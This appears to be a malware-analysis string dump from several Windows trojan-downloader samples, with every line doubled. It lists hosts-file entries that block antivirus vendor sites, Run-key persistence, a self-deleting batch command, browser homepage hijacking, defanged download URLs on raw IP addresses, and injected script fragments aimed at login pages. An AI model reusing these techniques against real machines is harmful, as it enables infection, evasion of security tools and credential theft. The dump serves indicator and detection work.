`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 localhost
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 kaba365.com
127.0.0.1 kaba365.com
xxD.Downloader
xxD.Downloader
VB5!6&vb6chs.dll
VB5!6&vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
advapi32.dll
RegCreateKeyA
RegCreateKeyA
RegCloseKey
RegCloseKey
VBA6.DLL
VBA6.DLL
c:\windows\system32\jarinet
c:\windows\system32\jarinet
cmd /c taskkill /f /im QQExtrenal.exe
cmd /c taskkill /f /im QQExtrenal.exe
hXXp://
hXXp://
%System%\drivers\etc\hosts
%System%\drivers\etc\hosts
Microsoft.XMLHTTP
Microsoft.XMLHTTP
Adodb.Stream
Adodb.Stream
c:\windows\inf\
c:\windows\inf\
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe "
c:\windows\system32\jarinet\QQExtrenal.exe "
.exe"
.exe"
xxDown.exe
xxDown.exe
lssaa.exe_1472:
.text
.text
`.rdata
`.rdata
@.data
@.data
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
GetCPInfo
GetCPInfo
.rsrc
.rsrc
GET %s HTTP/1.1
GET %s HTTP/1.1
Referer: %s
Referer: %s
Accept-Language: %s
Accept-Language: %s
User-Agent: %s
User-Agent: %s
Host: %s
Host: %s
Cookie: %s
Cookie: %s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
hXXp://192.240.107.44/toopu2.png
hXXp://192.240.107.44/toopu2.png
c:\windows\inf\lssaa.exe
c:\windows\inf\lssaa.exe
comine.exe_212:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
vb6chs.dll
vb6chs.dll
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
psapi.dll
psapi.dll
kernel32.dll
kernel32.dll
NTDLL.DLL
NTDLL.DLL
shell32.dll
shell32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
VBA6.DLL
VBA6.DLL
1.vbp
1.vbp
hXXp://VVV.hao12338.com/?index
hXXp://VVV.hao12338.com/?index
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
%Program Files%\Windows Media Player
%Program Files%\Windows Media Player
%Program Files%
%Program Files%
explorer.exe
explorer.exe
WScript.Shell
WScript.Shell
Iexplore.exe
Iexplore.exe
wscript.shell
wscript.shell
cmd /c ping 127.0.0.1 -n 2&del
cmd /c ping 127.0.0.1 -n 2&del
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
%Program Files%\Windows Media Player\comine.exe
%Program Files%\Windows Media Player\comine.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
WindowStyle
WindowStyle
Hotkey
Hotkey
serv.dat
serv.dat
spolsv.exe_1536:
.text
.text
`.rdata
`.rdata
@.data
@.data
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
WinExec
WinExec
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
InternetOpenUrlA
InternetOpenUrlA
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
WININET.dll
WININET.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GetCPInfo
GetCPInfo
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.kaspersky.com.cn
127.0.0.1 VVV.kaspersky.com.cn
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.rising.com.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 cn.trendmicro.com
127.0.0.1 cn.trendmicro.com
127.0.0.1 VVV.symantec.com
127.0.0.1 VVV.symantec.com
127.0.0.1 sd.360.cn
127.0.0.1 sd.360.cn
127.0.0.1 VVV.eset.com.cn
127.0.0.1 VVV.eset.com.cn
127.0.0.1 VVV.avast.com
127.0.0.1 VVV.avast.com
127.0.0.1 VVV.micropoint.com.cn
127.0.0.1 VVV.micropoint.com.cn
127.0.0.1 VVV.avira.com
127.0.0.1 VVV.avira.com
127.0.0.1 VVV.avg.com
127.0.0.1 VVV.avg.com
127.0.0.1 VVV.jiangmin.com
127.0.0.1 VVV.jiangmin.com
127.0.0.1 VVV.ggsafe.com
127.0.0.1 VVV.ggsafe.com
127.0.0.1 guanjia.qq.com
127.0.0.1 guanjia.qq.com
hXXp://192.240.107.42:8914/test/shua.txt
hXXp://192.240.107.42:8914/test/shua.txt
hXXp://192.240.107.42:8914/test/down.txt
hXXp://192.240.107.42:8914/test/down.txt
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
del "%s"
del "%s"
if exist "%s" goto nimei
if exist "%s" goto nimei
del_.bat
del_.bat
hXXp://
hXXp://
spolsv.exe
spolsv.exe
\spolsv.exe
\spolsv.exe
conime.exe
conime.exe
%WinDir%\spolsv.exe
%WinDir%\spolsv.exe
lll.exe_1840:
.text
.text
`.rdata
`.rdata
@.data
@.data
KERNEL32.dll
KERNEL32.dll
EnumWindows
EnumWindows
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
MSVCP60.dll
MSVCP60.dll
MSVCRT.dll
MSVCRT.dll
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
hXXp://124.232.158.94:1932/index.htm
hXXp://124.232.158.94:1932/index.htm
201508100029
201508100029
124.232.158.94
124.232.158.94
dk.23145.com
dk.23145.com
Applications\iexplore.exe\SHELL\OPEN\COMMAND
Applications\iexplore.exe\SHELL\OPEN\COMMAND
%s?%c%c%c%c%c
%s?%c%c%c%c%c
%s%c%c%c%c%c.htm
%s%c%c%c%c%c.htm
122.224.34.79
122.224.34.79
iexplore.exe_900:
%?9-*09,*19}*09
%?9-*09,*19}*09
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
SHLWAPI.dll
SHLWAPI.dll
SHDOCVW.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
IE-X-X
rsabase.dll
rsabase.dll
System\CurrentControlSet\Control\Windows
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
dw15 -x -s %u
watson.microsoft.com
watson.microsoft.com
IEWatsonURL
IEWatsonURL
%s -h %u
%s -h %u
iedw.exe
iedw.exe
Iexplore.XPExceptionFilter
Iexplore.XPExceptionFilter
jscript.DLL
jscript.DLL
mshtml.dll
mshtml.dll
mlang.dll
mlang.dll
urlmon.dll
urlmon.dll
wininet.dll
wininet.dll
shdocvw.DLL
shdocvw.DLL
browseui.DLL
browseui.DLL
comctl32.DLL
comctl32.DLL
IEXPLORE.EXE
IEXPLORE.EXE
iexplore.pdb
iexplore.pdb
ADVAPI32.dll
ADVAPI32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
IExplorer.EXE
IExplorer.EXE
IIIIIB(II<.fg>
IIIIIB(II<.fg>
7?_____ZZSSH%
7?_____ZZSSH%
)z.UUUUUUUU
)z.UUUUUUUU
,....Qym
,....Qym
````2```
````2```
{.QLQIIIKGKGKGKGKGKG
{.QLQIIIKGKGKGKGKGKG
;33;33;0
;33;33;0
8888880
8888880
8887080
8887080
browseui.dll
browseui.dll
shdocvw.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5512 (xpsp.080413-2105)
Windows
Windows
Operating System
Operating System
6.00.2900.5512
6.00.2900.5512
te.exe_1244:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
0123456789
0123456789
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
127.0.0.1
127.0.0.1
hXXp://
hXXp://
ole32.dll
ole32.dll
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
Windows NT
Windows NT
self.location
self.location
window.location=document.URL "
window.location=document.URL "
.URL "
.URL "
window.location=
window.location=
var customer = getCookie("safe");if (customer != "ver3.1.2"){alert("
var customer = getCookie("safe");if (customer != "ver3.1.2"){alert("
MSScriptControl.ScriptControl.1
MSScriptControl.ScriptControl.1
document.write(eval("
document.write(eval("
document.write(
document.write(
URL "
URL "
window.location
window.location
document.URL
document.URL
window.history.forward(1);
window.history.forward(1);
?jdfwkey
?jdfwkey
jdfwkey
jdfwkey
document.getElementsByTagName
document.getElementsByTagName
= document.getElementById("num").value
= document.getElementById("num").value
ssfwkey
ssfwkey
window.history.forward(1)
window.history.forward(1)
window.confirm("
window.confirm("
ment.URL
ment.URL
InternetExplorer.Application
InternetExplorer.Application
HTTP/1.1
HTTP/1.1
location="/codeimg.htm"
location="/codeimg.htm"
/codeimg.htm
/codeimg.htm
TLoginSock$
TLoginSock$
2, ip/port
2, ip/port
,web complete
,web complete
httpref:
httpref:
2000000000
2000000000
/safe123.jsp
/safe123.jsp
/safe123.jsp?username=
/safe123.jsp?username=
&key=
&key=
con.document.write('
'
con.document.write(''
con.document.write('
con.document.write('
/login.jsp?username
/login.jsp?username
/login.jsp
/login.jsp
ipspro.jsp?
ipspro.jsp?
flash.swf
flash.swf
/ecatflash.swf
/ecatflash.swf
aqdkey:
aqdkey:
/codeflash.htm
/codeflash.htm
69.165.66.213
69.165.66.213
fdipport:
fdipport:
23.251.41.170
23.251.41.170
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegQueryInfoKeyA
RegQueryInfoKeyA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
wsock32.dll
wsock32.dll
wininet.dll
wininet.dll
InternetOpenUrlA
InternetOpenUrlA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
1 1$1(1,1014181
1 1$1(1,1014181
3 3$3(3,3034383
3 3$3(3,3034383
2!2%2)2-21252~2
2!2%2)2-21252~2
00X0r0z0
00X0r0z0
KWindows
KWindows
HuntHTTPDownload
HuntHTTPDownload
vUCmdList
vUCmdList
/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Failed to get data for '%s'
Failed to get data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
%s.Seek not implemented$Operation not allowed on sorted list
OLE error %.8x.Method '%s' not supported by automation object
OLE error %.8x.Method '%s' not supported by automation object
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation